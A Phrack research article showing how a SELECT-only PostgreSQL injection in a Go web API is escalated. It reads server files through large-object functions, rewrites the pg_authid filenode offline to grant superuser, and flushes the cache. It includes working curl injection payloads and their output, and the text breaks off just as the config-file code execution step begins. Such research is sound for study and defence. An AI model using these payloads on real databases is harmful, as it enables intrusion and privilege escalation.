[ News ] [ Paper Feed ] [ Issues ] [ Authors ] [ Archives ] [ Contact ]


..[ Phrack Magazine ]..
.:: World of SELECT-only PostgreSQL Injections ::.

Issues: [ 1 ] [ 2 ] [ 3 ] [ 4 ] [ 5 ] [ 6 ] [ 7 ] [ 8 ] [ 9 ] [ 10 ] [ 11 ] [ 12 ] [ 13 ] [ 14 ] [ 15 ] [ 16 ] [ 17 ] [ 18 ] [ 19 ] [ 20 ] [ 21 ] [ 22 ] [ 23 ] [ 24 ] [ 25 ] [ 26 ] [ 27 ] [ 28 ] [ 29 ] [ 30 ] [ 31 ] [ 32 ] [ 33 ] [ 34 ] [ 35 ] [ 36 ] [ 37 ] [ 38 ] [ 39 ] [ 40 ] [ 41 ] [ 42 ] [ 43 ] [ 44 ] [ 45 ] [ 46 ] [ 47 ] [ 48 ] [ 49 ] [ 50 ] [ 51 ] [ 52 ] [ 53 ] [ 54 ] [ 55 ] [ 56 ] [ 57 ] [ 58 ] [ 59 ] [ 60 ] [ 61 ] [ 62 ] [ 63 ] [ 64 ] [ 65 ] [ 66 ] [ 67 ] [ 68 ] [ 69 ] [ 70 ] [ 71 ]
Current issue : #71 | Release date : 2024-08-19 | Editor : Phrack Staff
IntroductionPhrack Staff
Phrack Prophile on BSDaemonPhrack Staff
LinenoisePhrack Staff
LoopbackPhrack Staff
Phrack World NewsPhrack Staff
MPEG-CENC: Defective by SpecificationDavid "retr0id" Buchanan
Bypassing CET & BTI With Functional Oriented ProgrammingLMS
World of SELECT-only PostgreSQL InjectionsMaksym Vatsyk
A VX Adventure in Build Systems and Oldschool TechniquesAmethyst Basilisk
Allocating new exploitsr3tr074
Reversing Dart AOT snapshotscryptax
Finding hidden kernel modules (extrem way reborn)g1inko
A novel page-UAF exploit strategyJinmeng Zhou, Jiayi Hu, Wenbo Shen, Zhiyun Qian
Stealth Shell: A Fully Virtualized Attack ToolchainRyan Petrich
Evasion by De-optimizationEge BALCI
Long Live Format StringsMark Remarkable
Calling All Hackerscts
Title : World of SELECT-only PostgreSQL Injections
Author : Maksym Vatsyk
                             ==Phrack Inc.==

                Volume 0x10, Issue 0x47, Phile #0x08 of 0x11

|=-----------------------------------------------------------------------=|
|=-----------=[ World of SELECT-only PostgreSQL Injections: ]=-----------=|
|=--------------------=[ (Ab)using the filesystem ]=---------------------=|
|=-----------------------------------------------------------------------=|
|=-------------------------=[ Maksym Vatsyk ]=---------------------------=|
|=-----------------------------------------------------------------------=|

-- Table of contents

0 - Introduction
1 - The SQLi that started it all
    1.0 - Target info
    1.1 - A rather trivial injection
    1.2 - No stacked queries for you
    1.3 - Abusing server-side lo_ functions
    1.4 - Not (entirely) a superuser
    1.5 - Looking for a privesc
2 - PostgreSQL storage concepts
    2.0 - Tables and Filenodes
    2.1 - Filenode format
    2.2 - Table metadata
    2.3 - Cold and Hot Data storages
    2.4 - Editing filenodes offline
3 - Updating the PostgreSQL data without UPDATE
    3.0 - Identifying target table
    3.1 - Search for the associated Filenode
    3.2 - Reading and downloading Filenode
    3.3 - Extracting table metadata
    3.4 - Making ourselves a superuser
    3.5 - Flushing Hot storage
4 - SELECT-only RCE
    4.0 - Reading original postgresql.conf
    4.1 - Choosing a parameter to exploit
    4.2 - Compiling malicious library
    4.3 - Uploading the stuff back to the server
    4.4 - Reload successful
5 - Conclusions
6 - References
7 - Source code


--[ 0 - Introduction

This article tells the story of how a failed attempt to exploit a basic
SQL injection in a web API with the PostgreSQL DBMS quickly spiraled into
3 months of researching database source code and (hopefully) helping to
create several new techniques to pwn Postgres hosts in restrictive
contexts. Let's get into the story, shall we?


--[ 1 - The SQLi that started it all

---[ 1.0 - Target info

The target web app was written in the Golang Gin[0] framework and used
PGX[1] as a DB driver. What is interesting about the application is the
fact that it is a trusted public data repository - anyone can query all
data. The updates, however, are limited to a trusted set of users.

This means that getting a SELECT SQL injection will have no impact on the
application, while DELETE and UPDATE ones will still be critical.

Unfortunately, I am not allowed to disclose the source code of
the original application, but it can be roughly boiled down to this
example (with data and tables changed to something artificial):

--------------------------------------------------------------------------
package main

import (
    "context"
    "fmt"
    "log"
    "net/http"

    "github.com/gin-gonic/gin"
    "github.com/jackc/pgx/v4/pgxpool"
)

var pool *pgxpool.Pool

type Phrase struct {
    ID   int    `json:"id"`
    Text string `json:"text"`
}

func phraseHandler(c *gin.Context) {
    phrases := []Phrase{}

    phrase_id := c.DefaultQuery("id", "1")
    query := fmt.Sprintf(
        "SELECT id, text FROM phrases WHERE id=%s",
        phrase_id
    )

    rows, err := pool.Query(context.Background(), query)
    defer rows.Close()

    if err != nil {
        c.JSON(
            http.StatusInternalServerError,
            gin.H{"error": err.Error()}
        )
        return
    }

    for rows.Next() {
        var phrase Phrase
        err := rows.Scan(&phrase.ID, &phrase.Text)
        if err != nil {
            c.JSON(
                http.StatusInternalServerError,
                gin.H{"error": err.Error()}
            )
            return
        }
        phrases = append(phrases, phrase)
    }

    c.JSON(http.StatusOK, phrases)
}

func main() {
    pool, _ = pgxpool.Connect(
        context.Background(),
        "postgres://localhost/postgres?user=poc_user&password=poc_pass")

    r := gin.Default()
    r.GET("/phrases", phraseHandler)
    r.Run(":8000")

    defer pool.Close()
}
--------------------------------------------------------------------------


---[ 1.1 - A rather trivial injection

The actual injection happens inside the phraseHandler function on these
lines of code. The app directly formats the query parameter id into
the query string and calls the pool.Query() function. It couldn't be any
simpler, right?

--------------------------------------------------------------------------
phrase_id := c.DefaultQuery("id", "1")
query := fmt.Sprintf(
    "SELECT id, text FROM phrases WHERE id=%s",
    phrase_id
)

rows, err := pool.Query(context.Background(), query)
defer rows.Close()
--------------------------------------------------------------------------


The SQL injection can be quickly confirmed with these cURL requests:

--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode "id=1"
[
    {"id":1,"text":"Hello, world!"}
]

$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode "id=-1"
[]

$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode "id=-1 OR 1=1"
[
    {"id":1,"text":"Hello, world!"},
    {"id":2,"text":"A day in paradise."},
    ...
    {"id":14,"text":"Find your inner peace."},
    {"id":15,"text":"Dance in the rain"}
]
--------------------------------------------------------------------------

At this moment, our SQL query will look something like:

--------------------------------------------------------------------------
SELECT id, text FROM phrases WHERE id=-1 OR 1=1
--------------------------------------------------------------------------

Luckily for us, PostgreSQL drivers should easily support stacked queries,
opening a wide range of attack vectors for us. We should be able to append
additional queries separated by a semicolon like:

--------------------------------------------------------------------------
SELECT id, text FROM phrases WHERE id=-1; SELECT pg_sleep(5);
--------------------------------------------------------------------------


Let's just try it... Oh no, what is that?

--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" \
--data-urlencode "id=-1; SELECT pg_sleep(5)"
{
    "error":"ERROR: cannot insert multiple commands into a prepared
                statement (SQLSTATE 42601)"
}
--------------------------------------------------------------------------


---[ 1.1 - No stacked queries for you

It turns out that the PGX developers decided to **secure** driver use
by converting any SQL query to a prepared statement under the hood.

This is done to disable any stacked queries whatsoever[2]. It works
because the the PostgreSQL database itself does not allow multiple queries
inside a single prepared statement[3].

So, we are suddenly constrained to a single SELECT query! The DBMS will
reject any stacked queries, and nested UPDATE or DELETE queries are also
prohibited by the SQL syntax.

--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 OR (UPDATE * phrases SET text='lol')"
{
    "error":"ERROR: syntax error at or near \"SET\" (SQLSTATE 42601)"
}

$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 OR (DELETE * FROM phrases)"
{
    "error":"ERROR: syntax error at or near \"FROM\" (SQLSTATE 42601)"
}
--------------------------------------------------------------------------


Nested SELECT queries are still possible, though!

--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 OR (SELECT 1)=1"
[
    {"id":1,"text":"Hello, world!"},
    ...
    {"id":14,"text":"Find your inner peace."},
    {"id":15,"text":"Dance in the rain"}
]
--------------------------------------------------------------------------


Since one can read the DB data without the SQLi, is this bug even worth
reporting?


---[ 1.2 - Abusing server-side lo_ functions

Not all hope is lost, though! Since nested SELECT SQL queries are allowed,
we can try to call some of the built-in PostgreSQL functions and see if
there are any that can help us.

PostgreSQL has several functions that allow reading files from and writing
to the server running the DBMS. These functions[4] are a part of the
PostgreSQL Large Objects functionality, and should be accessible
to the superusers by default:

1. lo_import(path_to_file, lo_id) - read the file into the DB large object
2. lo_export(lo_id, path_to_file) - dump the large object into a file

What files can be read? Since the DBMS is normally running under the
postgres user, we can search for readable files via the following
command:

--------------------------------------------------------------------------
$ cat /etc/passwd | grep postgres
postgres:x:129:129::/var/lib/postgresql:/bin/bash

$ find / -uid 129 -type f -perm -600 2>/dev/null
...
/var/lib/postgresql/data/postgresql.conf       <---- main service config
/var/lib/postgresql/data/pg_hba.conf           <---- authentication config
/var/lib/postgresql/data/pg_ident.conf         <---- psql username mapping
...
/var/lib/postgresql/13/main/base/1/2654        <---- some data files
/var/lib/postgresql/13/main/base/1/2613
--------------------------------------------------------------------------


There already is an RCE technique, initially discovered by Denis
Andzakovic[5] and sylsTyping[6] in 2021 and 2022, which takes advantage
of the postgresql.conf file.

It involves overwriting the config file and either waiting for the server
to reboot or forcefully reloading the configuration via the
pg_reload_conf() PostgreSQL function[7].

We will return to this matter later in the article. For now, let's just
check if we have the permissions to call every function mentioned above.

Calling lo_ functions:
--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, CAST((SELECT lo_import('/var/lib/postgresql/data/postgresql.conf', 31337)) AS text)"
[
    {"id":1337,"text":"31337"}
]

$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, CAST((SELECT lo_get(31337)) AS text)"
[
    {"id":1337,"text":"\\x23202d2d2d...72650a"}
]
--------------------------------------------------------------------------


Large object functions work just fine! We've imported a file into the DB
and consequently read it from the object with ID 31337.


Calling pg_reload_conf function:
--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, CAST((SELECT pg_reload_conf()) AS text)"
[]
--------------------------------------------------------------------------


There is a problem with the pg_reload_conf function, however. In success
cases, it should return a row with the text "true".

Why can we call large object functions but not pg_reload_conf?
Shouldn't they both be accessible to a superuser?


---[ 1.3 - Not (entirely) a superuser

They should, but we happen to not be one. Our test user has explicit
permissions over the large object functions but lacks access to anything
else. The permissions should be similar to the below example
configuration:

--------------------------------------------------------------------------
CREATE USER poc_user WITH PASSWORD 'poc_pass'

GRANT pg_read_server_files TO poc_user
GRANT pg_write_server_files TO poc_user

GRANT USAGE ON SCHEMA public TO poc_user
GRANT SELECT, INSERT, UPDATE, DELETE ON TABLE pg_largeobject TO poc_user

GRANT EXECUTE ON FUNCTION lo_export(oid, text) TO poc_user
GRANT EXECUTE ON FUNCTION lo_import(text, oid) TO poc_user
--------------------------------------------------------------------------


---[ 1.4 - Looking for a privesc

If we want to perform RCE through the configuration file reliably, we must
find a way to become a superuser and call pg_reload_conf(). Unlike the
popular topic of PostgreSQL RCE techniques, there is not a whole lot of
information about privilege escalation from within the DB.

Luckily for us, the official documentation page for Large Object functions
gives us some clues for the next steps[4]:

> It is possible to GRANT use of the server-side lo_import and lo_export
> functions to non-superusers, but careful consideration of the security
> implications is required. A malicious user of such privileges could
> easily parlay them into becoming superuser (for example by rewriting
> server configuration files)

What if we were to modify the PostgreSQL table data directly, on disk,
without any UPDATE queries at all?


--[ 2 - PostgreSQL storage concepts

---[ 2.0 - Tables and Filenodes

PostgreSQL has extremely complex data flows to optimize resource usage and
eliminate possible data access conflicts, e.g. race conditions. You can
read about them in great detail in the official documentation[8][9].

The physical data layout significantly differs from the widely known
"table" and "row" objects. All data is stored on disk in a Filenode object
named with the OID of the respective pg_class object.

In other words, each table has its Filenode. We can lookup the OID and
respective Filenode names of a given table through the following queries:

--------------------------------------------------------------------------
SELECT oid FROM pg_class WHERE relname='TABLE_NAME'
// OR
SELECT pg_relation_filepath('TABLE_NAME');
--------------------------------------------------------------------------


All of the filenodes are stored in the PostgreSQL data directory. The path
to which can be queried from the pg_settings table by superusers:

--------------------------------------------------------------------------
SELECT setting FROM pg_settings WHERE name = 'data_directory';
--------------------------------------------------------------------------


However, this value should generally be the same across different
installations of the DBMS and can be easily guessed by a third party.

A common path for PostgreSQL data directories on Debian systems is
"/var/lib/postgresql/MAJOR_VERSION/CLUSTER_NAME/".

We can obtain the major version by running a "SELECT version()" query in
the SQLi. The default value of CLUSTER_NAME is "main".

An example path of a filenode for our "phrases" would be:
--------------------------------------------------------------------------
=== in psql ===

postgres=# SELECT pg_relation_filepath('phrases');
 pg_relation_filepath
----------------------
 base/13485/65549
(1 row)

postgres=# SELECT version();
                                                               version
-------------------------------------------------------------------------------------------------------------------------------------
 PostgreSQL 13.13 (Ubuntu 13.13-1.pgdg22.04+1) on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0, 64-bit
(1 row)

=== in bash ===

$ ll /var/lib/postgresql/13/main/base/13485/65549
-rw------- 1 postgres postgres 8192 mar 14 13:45 /var/lib/postgresql/13/main/base/13485/65549
--------------------------------------------------------------------------


So: all of the files with numeric names, found in section 1.2, are in
fact separate table filenodes that the postgres user can read and write!


---[ 2.1 - Filenode format

A Filenode is a binary file composed of separate chunks of 0x2000 bytes
called Pages. Each page holds the actual row data within nested Item
objects. The layout of each Filenode can be summarized with the below
diagram:

   +----------+
   | Filenode |
   +----------+-------------------------------------------------------+
   |                                                                  |
   |   +--------+                                                     |
   |   | Page 1 |                                                     |
   |   +--------+----+---------+---------+-----+---------+--------+   |
   |   | Page Header |Item ID 1|Item ID 2| ... |Item ID n|        |   |
   |   +-------------+----+----+---------+     +----+----+        |   |
   |   |                  |                         |             |   |
   |   |                  +-------------------------+--------+    |   |
   |   |                                            |        |    |   |
   |   |      +-------------------------------------+        |    |   |
   |   |      |                                              |    |   |
   |   |      |    ... empty space padded with 0x00 ...      |    |   |
   |   |      |                                              |    |   |
   |   |      +----------------------+                       |    |   |
   |   |                             |                       |    |   |
   |   |                             v                       v    |   |
   |   |                         +--------+     +--------+--------+   |
   |   |                         | Item n | ... | Item 2 | Item 1 |   |
   |   +-------------------------+--------+-----+--------+--------+   |
   |   ...                                                            |
   |   +--------+                                                     |
   |   | Page n |                                                     |
   |   +--------+                                                     |
   |   ...                                                            |
   |                                                                  |
   +------------------------------------------------------------------+


---[ 2.2 - Table metadata

It is worth noting that the Item objects are stored in the binary format
and cannot be manipulated directly. One must first deserialize them using
metadata from the internal PostgreSQL "pg_attribute" table. We can query
Item metadata using the following SQL query:

--------------------------------------------------------------------------
SELECT
    STRING_AGG(
        CONCAT_WS(
            ',',
            attname,
            typname,
            attlen,
            attalign
        ),
        ';'
    )
FROM pg_attribute
    JOIN pg_type
        ON pg_attribute.atttypid = pg_type.oid
    JOIN pg_class
        ON pg_attribute.attrelid = pg_class.oid
WHERE pg_class.relname = 'TABLE_NAME';
--------------------------------------------------------------------------


---[ 2.3 - Cold and Hot data storage

All of the above objects make up the DBMS' cold storage. To access the
data in cold storage through a query, Postgres must first load it in the
RAM cache, a.k.a. hot storage.

The following diagram shows a rough and simplified flow of how the
PostgreSQL accesses the data:

  +------------------+       +--------+       +------+        +------+
  |Table in RAM cache|------>|Filenode|--+--->|Page 1|---+--->|Item 1|
  +------------------+       +--------+  |    +------+   |    +------+
                                         |               |
                                         |    +------+   |    +------+
                                         +--->|Page 2|   +--->|Item 2|
                                         |    +------+   |    +------+
                                         |     ...       |     ...
                                         |    +------+   |    +------+
                                         +--->|Page n|   +--->|Item n|
                                              +------+        +------+


The DBMS periodically flushes any changes to the data in hot storage to
the filesystem.

These syncs may pose a challenge to us! Since we can only edit the cold
storage of a running database, we risk subsequent hot storage syncs
overwriting our edits. Thus, we must ensure that the table we want to
overwrite has been offloaded from the cache.

--------------------------------------------------------------------------
# -----------------------------
# PostgreSQL configuration file
# -----------------------------
...
# - Memory -

shared_buffers = 128MB          # min 128kB
                                # (change requires restart)
...
--------------------------------------------------------------------------


The default cache size is 128MB. So, if we stress the DB with expensive
queries to other tables/large objects before the flush, we might overflow
the cache and clear our target table from it.


---[ 2.4 - Editing filenodes offline

I've created a tool to parse and modify data stored in filenodes, which
functions independently of the Postgres server that created the filenodes.
We can use it to overwrite target table rows with our desired values.

The editor supports both datatype-assisted and raw parsing modes. The
assisted mode is the preferred option as it allows you to edit the data
safely, without accidentally messing up the whole filenode structure.

The actual parsing implementation is way too lengthy to discuss in this
article, but you can find the sources on GitHub[10], or the source code
in this article if reading online, if you want to dig deeper into it.

You can also check out this article[12] on parsing filenodes in Golang.


--[ 3 - Updating the PostgreSQL data without UPDATE

---[ 3.0 - Identifying target table

So, we are looking to escalate our permissions to those of a DBMS
superuser. Which table should we aim to modify? All Postgres permissions
are stored in the internal table "pg_authid". All CREATE/DROP/ALTER
statements for new roles and users actually modify this table under the
hood. Let's inspect it in a PSQL session under the default super-admin
user:

--------------------------------------------------------------------------
postgres=# SELECT * FROM pg_authid; \x
-[ RECORD 1 ]--+------------------------------------
oid            | 3373
rolname        | pg_monitor
rolsuper       | f
rolinherit     | t
rolcreaterole  | f
rolcreatedb    | f
rolcanlogin    | f
rolreplication | f
rolbypassrls   | f
rolconnlimit   | -1
rolpassword    | 
rolvaliduntil  | 
... TRUNCATED ... 
-[ RECORD 9 ]--+------------------------------------
oid            | 10
rolname        | postgres
rolsuper       | t
rolinherit     | t
rolcreaterole  | t
rolcreatedb    | t
rolcanlogin    | t
rolreplication | t
rolbypassrls   | t
rolconnlimit   | -1
rolpassword    |
rolvaliduntil  | 
-[ RECORD 10 ]-+------------------------------------
oid            | 16386
rolname        | poc_user
rolsuper       | f
rolinherit     | t
rolcreaterole  | f
rolcreatedb    | f
rolcanlogin    | t
rolreplication | f
rolbypassrls   | f
rolconnlimit   | -1
rolpassword    | md58616944eb80b569f7be225c2442582cd
rolvaliduntil  |
--------------------------------------------------------------------------


The table contains a bunch of "rol" boolean flags and other interesting
stuff, like the MD5 hashes of the user logon passwords. The default
superadmin user "postgres" has all boolean flags set to true.

To become a superuser, we must flip all boolean fields to True for our
user, "poc_user".


---[ 3.1 - Search for the associated Filenode

To modify the table, we must first locate and read the filenode from the
disk. As discussed previously, we won't be able to get the data directory
setting from the DBMS, as we lack permissions to read the "pg_settings"
table:

--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, (SELECT setting FROM pg_settings WHERE name='data_directory')"
{
    "error":"can't scan into dest[1]: cannot scan null into *string"
}
--------------------------------------------------------------------------


However, we can reliably guess the data directory path by querying the
version of the DBMS:

--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, (SELECT version())"
[
    {"id":1337,"text":"PostgreSQL 13.13 (Ubuntu 13.13-1.pgdg22.04+1) on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0, 64-bit"}
]
--------------------------------------------------------------------------


Version information gives us more than enough knowledge about the DBMS
and the underlying server. We can simply install a major version of
PostgreSQL release 13 on our own Ubuntu 22 VM and find that the data
directory is "/var/lib/postgresql/13/main":

--------------------------------------------------------------------------
ubuntu@ubuntu-virtual-machine:~$ uname -a
Linux ubuntu-virtual-machine 6.5.0-14-generic #14~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Mon Nov 20 18:15:30 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
ubuntu@ubuntu-virtual-machine:~$ sudo su postgres
postgres@ubuntu-virtual-machine:~$ pwd
/var/lib/postgresql
postgres@ubuntu-virtual-machine:~$ ls -l 13/main/
total 84
drwx------ 5 postgres postgres 4096 lis 26 14:48 base
drwx------ 2 postgres postgres 4096 mar 15 11:56 global
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_commit_ts
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_dynshmem
drwx------ 4 postgres postgres 4096 mar 15 11:55 pg_logical
drwx------ 4 postgres postgres 4096 lis 26 14:48 pg_multixact
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_notify
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_replslot
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_serial
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_snapshots
drwx------ 2 postgres postgres 4096 mar 11 00:45 pg_stat
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_stat_tmp
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_subtrans
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_tblspc
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_twophase
-rw------- 1 postgres postgres    3 lis 26 14:48 PG_VERSION
drwx------ 3 postgres postgres 4096 lut  4 00:22 pg_wal
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_xact
-rw------- 1 postgres postgres   88 lis 26 14:48 postgresql.auto.conf
-rw------- 1 postgres postgres  130 mar 15 11:55 postmaster.opts
-rw------- 1 postgres postgres  100 mar 15 11:55 postmaster.pid
--------------------------------------------------------------------------


With the data directory path obtained, we can query the relative path to
the "pg_authid" Filenode. Thankfully, there are no permission issues this
time.

--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, (SELECT pg_relation_filepath('pg_authid'))"
[
    {"id":1337,"text":"global/1260"}
]
--------------------------------------------------------------------------


With all the information in our hands, we can assume that the "pg_authid"
Filenode is located at "/var/lib/postgresql/13/main/global/1260".

Let's download it to our local machine from the target server.


---[ 3.2 - Reading and downloading the Filenode

We can now quickly download the file as a base64 string through the
Large Object functions "lo_import" and "lo_get" in the following steps:
--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,CAST((SELECT lo_import('/var/lib/postgresql/13/main/global/1260', 331337)) AS text)"
[
    {"id":1337,"text":"331337"}
]

$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,translate(encode(lo_get(331337), 'base64'), E'\n', '')" | jq ".[].text" -r | base64 -d > pg_authid_filenode
--------------------------------------------------------------------------


After decoding the Base64 into a file, we can confirm that we indeed
successfully downloaded the "pg_authid" Filenode by comparing the hashes.

--------------------------------------------------------------------------
=== on the attacker server ===
$ md5sum pg_authid_filenode
4c9514c6fb515907b75b8ac04b00f923  pg_authid_filenode

=== on the target server ===
postgres@ubuntu-virtual-machine:~$ md5sum /var/lib/postgresql/13/main/global/1260
4c9514c6fb515907b75b8ac04b00f923  /var/lib/postgresql/13/main/global/1260
--------------------------------------------------------------------------


---[ 3.3 - Extracting table metadata

One last step before parsing the downloaded Filenode -- we must get its
metadata from the server via the following SQLi query:

--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,STRING_AGG(CONCAT_WS(',',attname,typname,attlen,attalign),';') FROM pg_attribute JOIN pg_type ON pg_attribute.atttypid = pg_type.oid JOIN pg_class ON pg_attribute.attrelid = pg_class.oid WHERE pg_class.relname = 'pg_authid'"
[
    {"id":1337,"text":"tableoid,oid,4,i;cmax,cid,4,i;xmax,xid,4,i;cmin,cid,4,i;xmin,xid,4,i;ctid,tid,6,s;oid,oid,4,i;rolname,name,64,c;rolsuper,bool,1,c;rolinherit,bool,1,c;rolcreaterole,bool,1,c;rolcreatedb,bool,1,c;rolcanlogin,bool,1,c;rolreplication,bool,1,c;rolbypassrls,bool,1,c;rolconnlimit,int4,4,i;rolpassword,text,-1,i;rolvaliduntil,timestamptz,8,d"}
]
--------------------------------------------------------------------------


We should now be able to use our in-house Python3 Filenode editor to list
the data and confirm it is intact. The output for the "rolname" field will
be a bit ugly, because for some reason this field is stored in a 64-byte
fixed-length string padded with null bytes, instead of the common varchar
type:

--------------------------------------------------------------------------
$ python3 postgresql_filenode_editor.py \
-f ./pg_authid_filenode \
-m list \
--datatype-csv "tableoid,oid,4,i;cmax,cid,4,i;xmax,xid,4,i;cmin,cid,4,i;xmin,xid,4,i;ctid,tid,6,s;oid,oid,4,i;rolname,name,64,c;rolsuper,bool,1,c;rolinherit,bool,1,c;rolcreaterole,bool,1,c;rolcreatedb,bool,1,c;rolcanlogin,bool,1,c;rolreplication,bool,1,c;rolbypassrls,bool,1,c;rolconnlimit,int4,4,i;rolpassword,text,-1,i;rolvaliduntil,timestamptz,8,d"

 [+] Page 0:
--------- item no. 0 ---------
oid           : 10
rolname       : b'postgres\x00...'
rolsuper      : 1
rolinherit    : 1
rolcreaterole : 1
rolcreatedb   : 1
rolcanlogin   : 1
rolreplication: 1
rolbypassrls  : 1
rolconnlimit  : -1
rolpassword   : None

--------- item no. 1 ---------
oid           : 3373
rolname       : b'pg_monitor\x00...'
rolsuper      : 0
rolinherit    : 1
rolcreaterole : 0
rolcreatedb   : 0
rolcanlogin   : 0
rolreplication: 0
rolbypassrls  : 0
rolconnlimit  : -1
rolpassword   : None
... TRUNCATED ...
--------- item no. 9 ---------
oid           : 16386
rolname       : b'poc_user\x00...'
rolsuper      : 0
rolinherit    : 1
rolcreaterole : 0
rolcreatedb   : 0
rolcanlogin   : 1
rolreplication: 0
rolbypassrls  : 0
rolconnlimit  : -1
rolpassword   : b'md58616944eb80b569f7be225c2442582cd'
--------------------------------------------------------------------------


---[ 3.4 - Making ourselves a superuser

We can now use the Filenode editor to update Item no. 9, which contains
the entry for "poc_user". For convenience, we can pass any non-printable
fields (such as the "rolname" field) as base64 string. We will flip all
"rol" flags to 1 with the following editor command:

--------------------------------------------------------------------------
$ python3 postgresql_filenode_editor.py \
-f ./pg_authid_filenode \
-m update \
-p 0 \
-i 9 \
--datatype-csv "tableoid,oid,4,i;cmax,cid,4,i;xmax,xid,4,i;cmin,cid,4,i;xmin,xid,4,i;ctid,tid,6,s;oid,oid,4,i;rolname,name,64,c;rolsuper,bool,1,c;rolinherit,bool,1,c;rolcreaterole,bool,1,c;rolcreatedb,bool,1,c;rolcanlogin,bool,1,c;rolreplication,bool,1,c;rolbypassrls,bool,1,c;rolconnlimit,int4,4,i;rolpassword,text,-1,i;rolvaliduntil,timestamptz,8,d" \
--csv-data "16386,cG9jX3VzZXIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==,1,1,1,1,1,1,1,-1,md58616944eb80b569f7be225c2442582cd,NULL"
--------------------------------------------------------------------------


The script will save the updated Filenode to a file with ".new" as an
extension. We can now re-upload the data to the PostgreSQL server and
overwrite the original data through the SQLi.

--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,CAST((SELECT lo_from_bytea(3331337, decode('$(base64 -w 0 pg_authid_filenode.new)', 'base64'))) AS text)"
[
    {"id":1337,"text":"3331337"}
]

$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,CAST((SELECT lo_export(3331337, '/var/lib/postgresql/13/main/global/1260')) AS text)"
[{"id":1337,"text":"1"}]
--------------------------------------------------------------------------


So, we've just overwritten the Filenode on the disk! But the RAM cache
still has the old data. We must find a way to flush it somehow:

--------------------------------------------------------------------------
postgres=# SELECT * FROM pg_authid WHERE rolname='poc_user'; \x
-[ RECORD 1 ]--+------------------------------------
oid            | 16386
rolname        | poc_user
rolsuper       | f
rolinherit     | t
rolcreaterole  | f
rolcreatedb    | f
rolcanlogin    | t
rolreplication | f
rolbypassrls   | f
rolconnlimit   | -1
rolpassword    | md58616944eb80b569f7be225c2442582cd
rolvaliduntil  |
--------------------------------------------------------------------------


---[ 3.5 - Flushing Hot storage

So, you may be wondering - how can we force the server to clean the RAM
cache? How about creating a Large Object of a size matching the entire
cache pool? :DDDDD

--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,CAST((SELECT lo_from_bytea(33331337, (SELECT REPEAT('a', 128*1024*1024))::bytea)) AS text)"
[
    {"id":1337,"text":"33331337"}
]
--------------------------------------------------------------------------


The server took at least 5 seconds to process our query, which may
indicate our success. Let's check our permissions again:

--------------------------------------------------------------------------
postgres=# SELECT * FROM pg_authid WHERE rolname='poc_user'; \x
-[ RECORD 1 ]--+------------------------------------
oid            | 16386
rolname        | poc_user
rolsuper       | t
rolinherit     | t
rolcreaterole  | t
rolcreatedb    | t
rolcanlogin    | t
rolreplication | t
rolbypassrls   | t
rolconnlimit   | -1
rolpassword    | md58616944eb80b569f7be225c2442582cd
rolvaliduntil  |
--------------------------------------------------------------------------


Success! All "rol" flags were flipped to true! Can we reload the config
now?

--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, CAST((SELECT pg_reload_conf()) AS text)"
[
    {"id":1337,"text":"true"}
]
--------------------------------------------------------------------------

Notice that this query now returns a row with "text" set to "true",
confirming that we are indeed able to reload the config now.

That's more like it! We can now perform SELECT-only RCE.


--[ 4 - SELECT-only RCE

---[ 4.0 - Reading original postgresql.conf

The first step in performing the RCE is to download the original config
file. Since we are a super-admin now, we can query its path directly from
the "pg_settings" table without any extra path guessing effort:

--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, sourcefile FROM pg_file_settings"
[
